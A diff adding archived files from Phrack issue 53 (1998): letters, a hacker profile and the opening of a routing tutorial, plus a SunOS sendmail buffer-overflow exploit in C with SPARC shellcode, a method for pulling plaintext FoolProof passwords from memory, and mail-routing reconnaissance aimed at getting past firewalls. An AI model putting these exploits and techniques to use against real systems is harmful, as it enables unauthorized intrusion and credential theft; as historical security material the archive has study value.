+released for win3.x and win95.  All my information pertains directly to
+versions 3.0 and 3.3 of both the 3.x and 95 versions but should be good
+for all early versions if they exist.
+
+	I have spent some time playing with it.  It is capable of
+modifying the boot sequence on win3.x machines to block the use of hot
+keys and prevent users from breaking out of autoexec.  It also modifies
+the behavior of command.com so that commands can be verified by a
+database and anything deemed unnecessary or potentially malicious can be
+blocked (fdisk, format, dosshell?, dir, erase, del. defrag, chkdsk,
+defrag, undelete, debug, etc.).  Its windows clients provide for a way to
+log into/out of FoolProof for privileged access by using a password or
+hot key assignment.  The newer installation of 95 machines have a
+centralized configuration database that lives on our NetWare server.
+
+	My first success with breaking FoolProof passwords came by using
+a hex editor to scan the windows swap file for anything that might be of
+interested.  In the swap file I found the password in plain text.  I was
+surprised but thought that it was something that would be simply
+unavoidable and unpredictable.  Later though I used a memory editor on
+the machine (95 loves it when I do that) and found that FoolProof stores
+a copy of the user password IN PLAIN TEXT inside its TSR's memory space.
+
+	To find a FoolProof password, simply search through conventional
+memory for the string "FOOLPROO" (I don't know what they did with that
+last "F") and the next 128 bytes or so should contain two plaintext
+passwords followed by the hot-key assignment.  For some reason FoolProof
+keeps two passwords on the machine, the present one and a 'legacy'
+password (the one you used before you _thought_ it was changed).  There
+exist a few memory viewers/editors but it isn't much effort to write
+something.
+
+	Getting to a point where you can execute something can be
+difficult but isn't impossible.  I found that it is more difficult to do
+this on the win3.x machines because FoolProof isn't compromised by the
+operating system it sits on top of; basically getting a dos prompt is up
+to you (try file manager if you can).  95 is easier because it is very
+simple to convince 95 that it should start up into Safe-Mode and then
+creating a shortcut in the StartUp group to your editor and then
+rebooting the machine (FoolProof doesn't get a chance to load in safe
+mode).
+
+	I tried to talk to someone at SmartStuff but they don't seem to
+care what trouble their simple minded users might get into.  They told me
+I must be wrong because they use 128 bit encryption on the disk. 
+Apparently they don't even know how their own software works because the
+utility they provide to recover lost passwords requires some 32+
+character master password that is hardwired into each installation.
+
+JohnWayne <john__wayne@juno.com>
+
+0x6>-------------------------------------------------------------------------
+    [ old skool dept. ]
+
+<++> EX/smrex.c
+/*
+ *  Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd.
+ *  If you don't know what to do from there, kill yourself.
+ *  Remote stack pointer is guessed, the offset from it to the code is 188.
+ *
+ *  Use:    smrex buffersize padding |nc hostname 25
+ *
+ *  where `padding` is a small integer, 1 works on my sparc 1+
+ *
+ *  I use smrex 84 1, play with the numbers and see what happens.  The core
+ *  gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and
+ *  see where your offsets went wrong :)
+ *
+ *  I don't *think* this is the 8lgm syslog() overflow - see how many versions
+ *  of sendmail this has carried over into and let me know.  Or don't, I
+ *  wouldn't :)
+ *
+ *  P.S. I'm *sure* there are cleverer ways of doing this overflow.  So sue
+ *  me, I'm new to this overflow business..in my day everyone ran YPSERV and
+ *  things were far simpler... :)
+ *
+ *  The Army of the Twelve Monkeys in '98 - still free, still kicking arse.
+ */
+
+#include <stdio.h>
+
+int main(int argc, char **argv)
+{
+    long unsigned int large_string[10000];
+    int i, prelude;
+    unsigned long offset;
+    char padding[50];
+
+    offset  = 188;                          /* Magic numbers */
+    prelude = atoi(argv[1]);
+
+    if (argc < 2)
+    {
+        printf("Usage: %s  bufsize <alignment offset> | nc target 25\n",
+            argv[0]);
+        exit(1);
+    }
+
+    for (i = 6; i < (6 + atoi(argv[2])); i++)
+    {
+        strcat(padding, "A");
+    }
+    for(i = 0; i < prelude; i++)
+    {
+        large_string[i] = 0xfffffff0;       /* Illegal instruction */
+    }
+
+    large_string[prelude] = 0xf7ffef50;     /* Arbitrary overwrite of %fp */
+
+    large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */
+
+    for( i = (prelude + 2); i < (prelude + 64); i++)
+    {
+        large_string[i] = 0xa61cc013;       /* Lots of sparc NOP's */
+    }
+
+                        /* Now the sparc execve /usr/etc/rpc.rexd code.. */
+
+        large_string[prelude + 64] = 0x250bcbc8;
+        large_string[prelude + 65] = 0xa414af75;
+        large_string[prelude + 66] = 0x271cdc88;
+        large_string[prelude + 67] = 0xa614ef65;
+        large_string[prelude + 68] = 0x291d18c8;
+        large_string[prelude + 69] = 0xa8152f72;
+        large_string[prelude + 70] = 0x2b1c18c8;
+        large_string[prelude + 71] = 0xaa156e72;
+        large_string[prelude + 72] = 0x2d195e19;
+        large_string[prelude + 73] = 0x900b800e;
+        large_string[prelude + 74] = 0x9203a014;
+        large_string[prelude + 75] = 0x941ac00b;
+        large_string[prelude + 76] = 0x9c03a104;
+        large_string[prelude + 77] = 0xe43bbefc;
+        large_string[prelude + 78] = 0xe83bbf04;
+        large_string[prelude + 79] = 0xec23bf0c;
+        large_string[prelude + 80] = 0xdc23bf10;
+        large_string[prelude + 81] = 0xc023bf14;
+        large_string[prelude + 82] = 0x8210203b;
+        large_string[prelude + 83] = 0xaa103fff;
+        large_string[prelude + 84] = 0x91d56001;
+        large_string[prelude + 85] = 0xa61cc013;
+        large_string[prelude + 86] = 0xa61cc013;
+        large_string[prelude + 87] = 0xa61cc013;
+        large_string[prelude + 88] = 0;
+
+                        /* And finally, the overflow..simple, huh? :) */
+    printf("helo\n");
+    printf("mail from: %s%s\n", padding, large_string);
+}
+<-->
+
+0x7>-------------------------------------------------------------------------
+Practical Sendmail Routing
+
+Intro:
+
+This article will be short and sweet as the concept and methodology are quite
+simple.
+
+UUCP Style routing has been around longer than most newbie hackers, yet it is
+a foreign concept to them.  In past years, Phrack has seen at least one
+article on using this method to route a piece of mail around the world and
+back to the base host.  That article in Phrack 41 (Network Miscellany) by the
+Racketeer gave us a good outline as how to implement routed mail.  I will
+recap that method and show a practical use for it.  If you have any questions
+on the method for building the mail headers, read a book on UUCP or something.
+
+
+How to:
+
+In short, you want to create a custom route for a piece of email to follow.
+This single piece of mail will follow your desired path and go through
+machines of your choice.  Even with mail relaying turned off, MTAs will still
+past this mail as it looks at the mail and delivers only one hope at a time.
+The customized headers basically tell sendmail that it should only be
+concerned about the next target in the path, and to deliver.  In our example
+below, we will have nine systems to be concerned about.  Your base host, seven
+systems to bounce through, and the user on the final destination machine.
+
+     host1 = origin of mail. base host to send from.
+     host2 = second...
+     host3 = third... (etc)
+     host4
+     host5
+     host6
+     host7
+     host8 = final hop in our chain (i.e.: second to last)
+     user @ dest = final resting place for mail
+
+Most people will wonder "why route mail, sendmail will deliver directly".
+Consider the first step in doing a penetration of a foreign network: Recon. A
+would-be attacker needs as much information about a remote host as possible.
+Have you ever sent mail to a remote system with the intention of bouncing it?
+If not, try it.  You will find it a quick and easy way of finding out what
+version of what MTA the host is running.
+
+Knowing that the message will bounce with that information, think larger.  Send
+mail to multiple hosts on a subnet and it will return the version information
+for each machine it bounces through.  Think larger.  Firewalls are often set
+up to allow mail to go in and out without a problem.  So route your mail past
+the firewall, bounce it among several internal systems, then route the mail
+right back out the front door.  You are left with a single piece of mail
+containing information on each system it bounced through.  Right off, you can
+start to assess if the machines are running Unix or not among other things.
+
+So, with the example above, your mail 'to' will look like this:
+
+        host3!host4!host5!host6!host7!host8!dest!user@host2
+
+I know.  Very weird as far as the order and placement of each.  If you don't
+think it looks right, go reference it.
+
+Goal:
+
+The desired outcome of this mail is to return with as much information about
+the remote network as possible.  There are a few things to be wary of however.
+If the mail hits a system that doesn't know how to handle it, you may never
+see it again.  Routing the mail through a hundred hosts behind a firewall is
+risky in that it may take a while to go through, and if it encounters problems
+you may not get word back to know where it messed up.  What I recommend is
+sending one piece of mail per host on the subnet.  This can be scripted out
+fairly easy, so let this be a lesson in scripting as well.
+
+Theoretical Route 1:
+
+        you --.
+               firewall --.
+                           internal host1 --.
+                                            |
+                           internal host2 --'
+               firewall --'                     
+        you --'                                            
+
+
+Theoretical Route 2:
+
+If the internal network is on a different IP scheme than the external machines,
+(ie: address translation) then your mail will fail at the first hop by the
+above means.  So, we can try an alternative of passing mail to both sides of
+the firewall in order.  Of course, this would rely on knowledge of internal
+network numbering.  If you are wondering how to get this, two ways come to
+mind.  If you are one of those wacky 'white hat' ethical hackers, this
+information is often given during a controlled penetration.  If you are a
+malicious 'black hat' evil hacker, then trashing or Social Engineering might
+be an option. 
+
+
+   you --.
+          firewall (external interface) --.
+                                           firewall (internal interface) --.
+                                                                           |
+                                                      .-- internal host1 --'
+                                                      |
+                                                      `-- internal host2 --.
+                                                                           |
+                                           firewall (internal interface) --'
+          firewall (external interface) --'
+   you --'
+
+
+Taking it to the next level:
+
+So if you find this works, what else can you do?  Have a remote sendmail attack
+lying around?  Can you run a command on a remote machine?  Know what an xterm
+is?  Firewalls often allow a wide variety of traffic to go outbound.  So route
+a remote sendmail based attack to the internal host of your choice, spawn an
+xterm to your terminal and voila.  You just bypassed a firewall!
+
+
+Conclusion:
+
+Yup.  That is it.  Short and sweet.  No need to put excess words in this
+article as you are probably late on your hourly check of rootshell.com looking
+for the latest scripts.  Expand your minds.
+
+Hi:
+
+mea_culpa   mea_culpa@sekurity.org
+
+* "taking it to the next level" is a bastardized trademark of MC.
+* 'wacky white hat ethical hacker' is probably a trademark of IBM.
+* 'malicious black hat evil hacker' is a trademark of the ICSA.
+
+0x8>-------------------------------------------------------------------------
+
+                        Resource Hacking and Windows NT/95
+
+                                by Lord Byron
+
+    With the release of Windows NT service pack 3 the infamous Winnuke denial
+of service attacks are rendered useless.  At least that is what they lead you
+to believe.  This is not the case.  To understand why we need to delve into a
+little background on the internals of Windows; more specifcally, the way that
+Windows allocates memory.  This is the undying problem.  To better understand
+the problems with Windows memory allocation you have to go very deep within the
+operating system, to what is commonly called the "thunking layer".  This layer
+is what allows Windows to call both 16 and 32-bit functions on the same
+function stack.  If you make a TCP/IP-type function call or (if you are a
+database person) an ODBC function call you are calling a pseudo 32-bit
+function.  Yes, both of these direct drivers are 32-bit drivers but they rely
+upon 16-bit code to finish their process.  Once you enter one of these drivers
+all the data is passed into that driver.  Windows also requires all drivers to
+run at the level 0 level within the Windows kernel.  These drivers then pass
+off the data to different 16-bit functions.  The difficulty with passing off
+32-bit data to a 16-bit function is where the thunking layer comes into the
+picture.  The thunking layer is a wrapper around all 16-bit functions in
+Windows that can be called by a 32-bit function.  It thunks the data calls
+down to 16-bit by converting them into multiple data elements normally done by
+a structure or by passing the actual memory dump of the variable and passing
+the data dump into the function.  Then the function does its processing to the
+data within the data-gram and passes it back out of the function.  At this
+point it goes back through the thunking layer and reconverts the data back to
+a 32-bit variable and then the 32-bit driver keeps on with its processing.
+This processing of the thunking layer is not an unheard of scheme nor has it
+not been used before but with the way that we all know that Microsoft codes it
+was done in a hurry, not properly implemented, and never tested till
+production.  Do to the aforementioned reasons it should not surprise to anyone
+that the code has severe memory leaks.  This is why if you, for example, make
+an ODBC call to an Oracle database long enough that eventually your Windows
+box becomes slower until an eventual crash "Blue Screen of Death" or just
+becomes unbearable to work with.  As Microsoft tries to patch these bugs in
+the device drivers it releases service packs such as SP3.  The way that
+Microsoft has developed and implements the device driver process is on a
+modular code basis.  So when a patch is implemented it actually calls the
+modulated code to handle the exact situation for that exploit.
+
+    Now that you know some of the basic internals as to how Windows makes its
+calls it is time to understand resource hacking and the reason Win-nuke still
+works.  If you ping a Windows box it allocates a certain amount of ram and
+runs code within the driver that returns the ICMP packet.  Well if you ping a
+windows box 20,000 or 30,000 times it has to allocate 20 or 30 thousand
+chunks of memory to run the device driver to return the ICMP packet.  Once 20
+or 30 thousand little chunks of memory out there you do not have enough memory
+to run allow the TCP/IP driver to spawn the code to handle normal function
+within the Windows box.  At this point if you were to run Win-nuke to send the
+OOB packet to port 139 on a Windows box in would crash the box.  The OOB code
+that was used to patch Win-nuke in SP3 could not be spawned due to the lack of
+memory available and thus uses the original code for the TCP/IP.sys so it gets
+processed by the standard TCP/IP driver that was original shipped with Windows
+without the fix.  The only way for Microsoft to actually fix this problem
+would be to rewrite the TCP/IP driver with the correct code within it as the
+core driver (instead of writing patches to be spawned when the exception
+occurs).  In doing this though would require Microsoft a significant amount of
+coding skill and talent which we know that no self respecting coder would ever
+work for the big evil.
+
+0x9>-------------------------------------------------------------------------
+
+----[  PDM
+
+Phrack Doughnut Movie (PDM) last issue was `Grosse Point Blank`.
+
+PDM52 recipients:
+
+    Jim Broome
+    Jonathan Ham
+    Jon "Boyracer" George
+    James Hanson
+    Jesse Paulsen
+    jcoest
+
+All the recipients have J* first names.  Eerie.  And what is actually involved
+in `boyracing`?  Do they put little saddles on them?
+
+PDM53 Challenge:
+
+    "...Remember, ya always gotta put one in the brain.  The first one puts him
+    down, the second one finishes him off.  Then he's dead.  Then we go home."
+
+
+----[  EOF
diff --git a/phrack53/4.txt b/phrack53/4.txt
new file mode 100644
index 0000000..46f483f
--- /dev/null
+++ b/phrack53/4.txt
@@ -0,0 +1,370 @@
+----[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 04 of 15
+
+
+-------------------------[  P H R A C K     5 3     P R O P H I L E
+
+
+-----------------[  Personal
+
+
+              Handle: Glyph
+            Call him: Yesmar
+           Reach him: glyph@dreamspace.net
+        Past handles: The Raver (cDc), Necrovore (Bellcore),
+                      Violence (The VOID Hackers)
+       Handle origin: Egyptian mythology:  glyph \'glif\ n [Gk glyphe^-
+                      carved work, fr. glyphein to carve -- more at
+                      CLEAVE] (ca. 1727) a symbol that conveys information
+                      nonverbally (e.g., heiroglyphics).
+       Date of birth: Late 60's
+ Age at current date: As old as the lunar landing
+              Height: 5'10" or so
+              Weight: Skinny (I hate fat people)
+           Eye color: Blue
+          Hair color: Brown
+           Computers: Started with a TeleVideo 920 dumb terminal and worked
+                      my way up to a small collection of SGI and NeXT boxes.
+   Sysop/Co-Sysop of: Nothing that you've ever heard of (limited lifespan
+                      hacker boards on Prime superminis and VAX mainframes
+                      located on the X.25 global data networks).
+            Admin of: Go look in the InterNIC databases yourself.
+                URLs: I am not going to support the World Wide Waste of time
+                      in my Pro-Phile.
+
+
+I first started playing with computers when I was nine years old.  I started
+by learning FORTRAN on a Prime supermini at the local university where my
+parents worked.  Later I learned BASICA on the original IBM PC (what hulks
+those were).  Then a shipment of Apple ][+'s arrived and I learned about
+the joys of warez.  Ultima ][, Wizardry, and all the rest kept me busy for
+a couple of years.  I never had my own computer, so I had to hike down to
+the university computer center to frotz around.
+
+Around 1984 I was loaned a TeleVideo 920 dumb terminal and a 300 baud USR
+modem.  I used it to connect to the university's PRIME cluster.  A hacker
+was born.  I had a legitimate account, but managed to obtain additional
+user IDs by exploring the filesystem.  I had also begun tinkering around
+with the telephone network by this time.
+
+Later I got an Apple //c and eventually a //gs.  These computers got me
+back into the warez scene.  One month I got a $500 phone bill.  The next
+month the phone bill was back to $0.  The only difference was that the
+warez intake had nearly doubled.  Indeed, I had learned about codes.  I
+spent a lot of time calling warez boards around the country.  Ultimately
+I tired of the pirate scene, mainly because of all the inane bickering.
+I also stopped phreaking because I had gotten scared.  I disappeared for
+a year or so.
+
+Eventually I made a comeback.  I wanted to continue to play with computers
+and networks, but I wanted to avoid the phreaking scene.  I decided that
+I needed a name.  I decided to call myself 'The Raver' after Turiya Raver
+from _The Chronicles of Thomas Covenant the Unbeliever_.  (Note:  the rave
+scene was unknown in the U.S. at the time).  I spent a lot of time calling
+hack/phreak boards and learning.
+
+I discovered that I really liked this new communications medium known as
+tfiles:  files containing pure ASCII text.  Tfiles could be about hacking,
+phreaking, anarchy, or best of all, DEAD COWS WHO RULE THE WORLD.  Yes, I
+had discovered a rare beauty on the BBS landscape of the 80's:  cDc --
+the Cult of the Dead Cow.  I was entranced.  These people of the cow were
+like digital punks, espousing their wild views without a single care.  I
+was instantly hooked.  I started writing tfiles.  Before long, I found
+myself invited to join the forces of the Cow.  How could I decline Bob and
+Elsie?  So it came to pass that I contributed to what I consider a class
+movement in the telecom scene of the late 80's.  cDc fulfilled my need to
+communicate and hang with open-minded people in a BBS context.
+
+In time, my desire to hack started to come back.  At first it was merely
+an 'itch' to poke at a system.  Later it developed into a full-blown need
+to get into everything I could.  It was around this time that I started
+exploring TELENET and the global X.25 data networks.  I met ParMaster,
+the original members of Bellcore, and LOD/H on altger in Munich.  I was
+hooked.  Par and I, considering ourselves lame at the time, formed a group
+named XTension.  The group flourished on the European networks.
+
+Eventually half of XTension were invited to join Bellcore.  This was the
+first time any of us had experienced a rift in friendship over the digital
+medium.  It was a painful learning experience.  I would not talk to Par
+again for many years.  In the meantime, I began working at learning even
+more under the wings of Bellcore.  I hacked Primes for Bellcore.  Under the
+tutelage of Chippy I discovered the ways of UNIX and TCP/IP networking.
+
+I changed my name to Necrovore in order to make clear the changes that had
+occured.  The name comes from the fact that I was very much into death
+metal at the time.  Naming myself after the 'Eater of the Dead' seemed like
+a very reasonable thing to me at the time.  (God, what was I thinking!?)
+At any rate, the Mentor of LOD and I used to pick fights with each other
+online across the world, so it isn't surprising that 'Necrovore' found its
+way into a Steve Jackson Game's GURPS Supers module as one of the super
+villains.  Heh.
+
+Eventually Bellcore fell apart, as did so many groups.  It became 'cool'
+and then too many people were invited to join, and then the trust fell
+apart.  If there is a lack of trust, how can work be accomplished?  Bellcore
+was done.  It depressed me a lot because LOD continued strong.  Was what
+I had fought for worthless?  I thought not.  At that time I decided that
+the days of Big Groups were over.  Now it was time for the Small Cell.
+
+The VOID Hackers were created by myself and The Usurper, now Thrashing Rage,
+a fellow ex-Bellcore member.  We recruited Dr. Psychotic, a class assembly
+language hacker, and The Scythian, another hacker with a famous past, and
+started in after Primes and VAXen around the world.  I wrote a lengthy series
+of articles on hacking Primes and submitted it to 2600.  I got yelled at
+later by TK and KL for not submitting it to Phrack.  To know the truth, I
+didn't think it was good enough for Phrack, which had been the soul of the
+scene since its inception.  I never heard back from 2600.  (Go figure.)
+
+The VOID Hackers surpassed my wildest expectations.  We hit systems across
+the planet.  We had hundreds and hundreds of systems at our beck and call.
+It could only get better, or so I thought.  Imagine my surprise then, one
+day, when my mom picked me up from school and told me that there were
+'security people' at the house right then.  'FUCK,' I thought.  Fuck,
+indeed.  I was popped at age 20.
+
+I managed to avoid a multiple felony rap and retired right away.  I used
+contacts to make it clear to government intelligence people and others
+that I was finished.  I went to university and majored in English, then
+Anthropology, and ultimately settled on Computer Science.  Instead of
+criminal hacking, I delved into hacking from the MIT perspective.  I
+explored the UNIX system and sharpened my programming skills.
+
+Eventually I left the protected world of academia and made my way into the
+computer industry.  With the heavy advent of the Internet I reappeared on
+the scene as glyph.  It was interesting running into old friends (and
+enemies) and meeting new hackers on the scene.  I went to several cons and
+continued to frolic in the security domain.  By this time, however, I had
+pretty much ceased to engage in criminal hacking, spending my time instead
+developing security tools.  Now I am completely retired.  You may still
+see me as glyph from time to time, however.  Undoubtedly, there are more
+of 'me' out there.  grep.  It's been a long, strange ride.  I'd do it all
+over again if I wasn't so old.  8)
+
+
+----------------[  Favorite things
+
+    Women: Australian chicks rule.
+
+     Cars: I don't drive.  I might if I could recompile traffic algorithms,
+           however this doesn't seem all that likely.  I definitely would
+           not drive a BMW.  There are too many of those around as it is.
+           I used to drive a skateboard.  That was a long time ago, though.
+           Brains and computers are still good to drive, however.  Vrooom.
+
+    Foods: Shrimp Vindaloo, please.  Hot and spicy ethnic.  Non-processed.
+
+  Alcohol: Fine Italian Chianti.  Vodka.  Exotic imported beer.  More Vodka.
+
+    Music: Scorn, ClockDVA, My Life With the Thrill Kill Kult, Coil, Slint,
+           Killing Joke, Chrome, Kraftwerk, Jane's Addiction, Zillatron,
+           John Zorn, Praxis, Lard, Meat Beat Manifesto, Eat Static, Suede,
+           Bill Laswell, Sepultura, Grotus, Mr. Bungle, Ozric Tentacles,
+           Pink Floyd, Frontline Assembly, Dayglo Abortions, Dead Kennedys,
+           Metallica, Slayer, Kreator, and lots and lots of other stuff.
+
+   Movies: The Stepford Wives, Invasion of the Body Snatchers, Brazil,
+           Marathon Man, Blade Runner, anything by Akira Kurosawa,
+           Memoirs of An Invisible Man, The Usual Suspects, Aeon Flux,
+           Heavy Metal, Light Years.
+
+  Authors: Jorge Luis Borges, J. R. R. Tolkein, Kurt Vonnegut, Jr., Sun Tzu,
+           Stephen R. Donaldson, H. P. Lovecraft, Gabriel Garcia Marquez,
+           Clark Ashton Smith, Umberto Eco, George Orwell, Thomas Ligotti,
+           Douglas Adams, Robert Anton Wilson.
+
+ Turn Ons: Intelligence, algorithms, open mindedness, guitars, see "Women".
+
+Turn Offs: Arrogance, stupidity, shallowness, closed mindedness, media whoring.
+
+
+----------------[  Passions
+
+Music.  Listening to it as well as making it.
+
+Reading and writing.
+
+Programming algorithms and data structures.
+
+I have this rock that I found in the creek next to the elementary school I
+used to attend when I was in 3rd grade.  The rock weighs over 7 pounds and
+is shaped like a pebble.  I hefted it from the waters and proclaimed it as
+'Herman', my pet rock.  I've had it ever since I was 9 years old.  That was
+the same year I first experienced computers.  Holding on to this rock all
+these years has definitely been a passion of mine.
+
+Slowly becoming a social recluse.  I actually think this is healthy for me.
+
+
+----------------[  Memorable experiences
+
+Watching Wargames for the first time.  Yes, I admit it.  It affected my life.
+
+Being lame and creating the group XTension with ParMaster.  It was the first
+group for both of us.  We thought it was pretty cool at the time.
+
+Backdooring PRIMOS Rev. 22.0... yes, the actual source code repository.  8)
+
+Trashing.  Hiding in the dumpster while the janitor dumped trash on my head.
+
+Hacking Europe, South America, and parts of Asia.  Globe travelling...
+
+Altger (NUA 026245890040004).  Sigh.  I liked it a lot better than irc.
+
+SummerCon '95.  Other than knowing The Usurper and Hyperminde, and having
+Byteman visit from New Jersy for two weeks, I hadn't ever really met other
+real, live hackers before.  Very cool.
+
+chuck and edward.
+
+The l's.  Bastards.  8)
+
+Cytroxia on acid.  Way to go, Danny.
+
+The great 7-day Alliance Teleconference.  I remember waking up to blasts of
+DTMF tones and raucous laughter.
+
+TELENET.  PAD to PAD.  NUIs.  TELENET THINGIES!!!1!!  DNIC scanning.
+
+That VAX cluster.  Hey Par, remember *that* VAX cluster?
+
+PROTEON.
+
+XTension being rent asunder as half the members were invited into Bellcore
+and the other half being politely told to fuck off.
+
+Novation AppleCat modems.
+
+Watching a CERT advisory happen--from the inside.  It was advisory CA-89.03.
+Hiya, Chippy!  Where are you?
+
+Social engineering for the first time.  It worked, go figure.
+
+The Richard Sandza teletrial.
+
+Getting busted.  I missed SummerCon '89 as a result.  From Phrack #28 PWN:
+Violence and The Scythian:  "We got busted by SoutherNet, but we'll be there!"
+
+Backdooring a major network entity for the first time--the exhilheration.
+
+PC PURSUIT.  Oopsy.
+
+Discovering I was published in 2600--almost 7 years after the fact!
+Hey, I got my free issues and t-shirts!
+
+Fuck QSD channel.
+
+Outdials.
+
+The TCP/IP Drinking Game.  Version 1.0.  SummerCon '96 in D.C.  Talk about a
+quick buzz.  NeTTwerk gave the speech.  BioH, .mudge, ReDragon, myself, and
+a few others drank, and drank, and drank.  A good time, to be sure.  If anyone
+reading this has video footage of the event, please mail me.
+
+Backdooring a major VAX application using a hex editor.
+
+Jamming on Control-C and falling through the login command processor into old
+Primes.  ROTFL.
+
+Hacking from Dataphones in Boston.
+
+My first buffer overflow.  I remember talking on the phone with .mudge as I
+worked out the details.
+
+Falling in love.
+
+Falling out of love.
+
+
+----------------[  People to mention
+
+In no particular order:
+
+Dr. Who, BioHazard, Alhambra, .mudge, Dr. Cypher, Asriel, Bill From RNOC,
+_*Hobbit (still reading flammage after all these years), Swamp Rat, N8,
+The Dictator (AKA Dale Drew), Frankengibe, The Mentor, FryGuy, Garbage Heap,
+The Scythian, Mr. Xerox, MasterMicro, 0x486578, Tim N. (love your code),
+Bika (dig that hair), Grave45, Shewp, SkyHook, Blade Runner, Mycroft,
+Shatter, Sir Hackalot, Nirva, Crimson Death, Par, Taran King, Thingo It,
+Knight Lightning, Enkhyl, CheapShades, The Force, Byteman, The Leftist,
+Chippy (la la la), Mad Hacker (the *real* one), The Usurper/Thrashing Rage,
+Kewp (NOT!), Touch Tone (My voice isn't *that* hiiiigghhhh!!! CONNECT 1200),
+The Urvile/Necron 99, Hyperminde/Dr. Psychotic (Remember, until there is a
+cure for Assembly Language Brain Fry, there will always be the N.C. Home
+for Deranged Programmers), ReDragon, B, Route, GyroTech, Epsilon,
+Control-C (thanks for all the prank calls!).  Lastly, I *must* mention that
+cool ass M.I. guy who tried to bust me--you were rad!  (It was a truly good
+game.  You told me to go to college, and I did.  You also taught me not to
+under-estimate the enemy, because I did.)
+
+
+----------------[ Boards to mention
+
+Elite Boards:  Phoenix Project, Digital Logic, Pirate-80, Speed Demon Elite,
+the various Metalland systems, The Metal AE, Demon Roach Underground, upt.org,
+The Polka AE, The Lost City of Atlantis, Lunatic Labs, The Dead Zone, Ripco,
+Broadway Show/Radio Station, The Central Office, The Missing Link, Lutzifer,
+The Works, upt.org, and the L0phT BBS.  There are undoubtedly more, but these
+are the ones I remember to this day.
+
+Local Boards:  Never a fan of 'local' boards, there are only two that I can
+recall as being k-interesting to any degree: The Padded Cell and Pandemonium,
+both of which were in the 919 NPA.
+
+
+----------------[  Quotes
+
+Gimme sum PR1MEZ!1!!
+
+May the Forces of Darkness become confused on the way to your house.
+
+<SN> WERE THE SEKRATARIES THAT R00L CYBERSPACE
+<SN> WE SKRIBBLE GFILES IN SHORTHAND
+<SN> HEY THE RAVER EYE HEAR U PACK A MEAN LUNCHBoX
+<SN> HEY ITS THE RAVER 0F CDC @#$@#
+<SN> HEY RAVER OF CDC @$@#$
+<SN> RAVER COME OVER HERE AND POSE WITH ME AND GHEAP F0R A PH0T0
+<SN> I CANT BELIEVE EYEM ON IRC WITH THERAVER OF CDC
+<SN> @$)%(&@*($&#*
+<SN> HEY LADYADA, IM ON IRC WITH THE RAVER OF CDC
+<SN> CAN YOU BELIEVE IT?!
+<SN> IM ST00PID NIGGAH oF M0D
+
+I don't think that was really SN, but it was funny as hell anyway.
+
+* glyph is away - vomiting binary - all Lame messages will be ignored.
+<n8> I actually vomit hex, but that always seems to break down into binary
+       if it sits on the floor for a while
+
+When I was a kid, nobody ever picked me to play dodge ball, kick ball, or
+whatever.  If I was picked, I was always last or second to last.  You can
+imagine what a pleasure the following was to read:
+
+<Asriel> WE PICK GLYPH
+<DaveNull> WE ALREADY HAVE GLYPH ASRIEL
+<Asriel> oh
+<Asriel> fuck
+<Asriel> well
+<Asriel> at least we have knuth
+
+Other quotes have been lost to the vestiges of time.
+
+
+----------------[  The future of the computer underground
+
+I see a future without me.
+
+
+----------------[  The forgotten pro-phile question
+
+...And now for the [once] regularly taken poll from all interviewees.
+
+    Of the general population of phreaks and hackers you have met, would
+you consider most, if any, to be computer geeks?
+
+    No.  Most phreaks and hackers that I have met are not geeks.  They are
+more likely to be utter freaks, however, but not nerds or geeks.  Geeks
+lack social skills.  Phreaks and hackers have a definite social world that
+extends beyond phone switches and computer networks.
+
+    Thanks for your time, Yesmar.  "No problem."
+
+----[  EOF
diff --git a/phrack53/5.txt b/phrack53/5.txt
new file mode 100644
index 0000000..fc0854d
--- /dev/null
+++ b/phrack53/5.txt
@@ -0,0 +1,866 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 05 of 15
+
+
+-------------------------[  Introduction and Overview of Internet Routing
+
+
+--------[  krnl <krnl@heuristic.org>
+
+
+
+----[  Routing Overview: 
+
+The process of routing can be quickly summarized as a node finding the path to
+every possible destination.  Routing is present in everything from layer 1
+(the physical layer) on up.  The routing that most people are familiar with,
+however, occurs at layer 3 (the network layer) and as such, we will only
+reference layer 3 (and more specifically) Internet Protocol (IP) routing in
+this document.
+
+Protocols for exchange of routing information connect multiple routers around
+the world to provide them with a common view of the network through their
+heterogeneous, though generally consistent routing tables.  Routing tables
+store all information necessary for the router to reach every destination on
+the network irrespective of size (i.e. the network could be j.random LAN with
+one ip router and two hosts off of an ethernet port or it could be the
+Internet proper).
+  
+----[  Routing Protocols: 
+
+There are a wide variety of routing protocols used to contribute to the
+routing tables across a network.  Protocols such as BGP, OSPF, RIP and ISIS
+help to convey a correct and coherent picture of the network to all network
+switches (routers). 
+
+----[  Routing Goals: 
+
+You can imagine that if each router has to store information that would allow
+it to reach every destination on the network, there is the possibility for it
+to amass a large routing table.  Large routing tables are difficult (and
+sometimes impossible) for routers to process because of physical constraints
+(cpu, memory or a combination).  Therefore, we would like to minimize the
+routing table space without sacrificing the ability to reach every destination
+on the network.  For example, if the router is connected to the Internet via
+one DS1 link to another router, the router could store routing table
+information for each destination on the Internet or it could just default
+non-local information out that serial link.  What defaulting means is that if
+the router does not have a specific entry in its table for the destination
+that the packet is trying to find, it sends it out the default link.  The
+router towards which a router sends defaulted packets is sometimes called the
+'gateway of last resort'.  This simple trick allows many routing tables to
+save a number of entries on the 30th order of magnitude.  Routing information
+should not be exchanged between routers in a spurious fashion.  Frequent churn
+in the routing table puts unnecessary stresses on the scare memory and cpu of
+any given router.  Information propagation should not interfere with the
+forwarding operations of the router.  Though this means that you should not
+send routing updates every nanosecond, it does not mean that routing
+information should only be exchanged and updated weekly.  One of the important
+goals of routing is that it provide the host with a table which accurately
+reflects the current status of the network. 
+
+The most important aspect of a router's operation is sending packets from
+input to correct output.  Misrouting packets could cause a loss of data.
+Routing table inconsistencies could also cause routing loops whereby a packet
+is passed between two adjacent interfaces ad infinitum. 
+
+It is desirous for routers to have quick convergence.  Convergence can be
+informally defined as a metric which gauges the speed at which routers arrive
+at a consistent view of the network.  It would be ideal to have infinitesimal
+convergence times because that would ensure that each router on the network
+can accurately reflect the current topology even after a drastic change (link
+failure).  When the network is changing, each router must propagate data which
+will aid other routers in converging to the correct picture of the network
+status.  Problems with quick convergence are found in the routing updates.  If
+a link is flapping (changing line status from up to down) rapidly, it can
+generate numerous installation and withdrawal requests.  Therefore, that one
+link can end up consuming the resources of every router on the network because
+the other routers are forced to install and withdraw the route in rapid
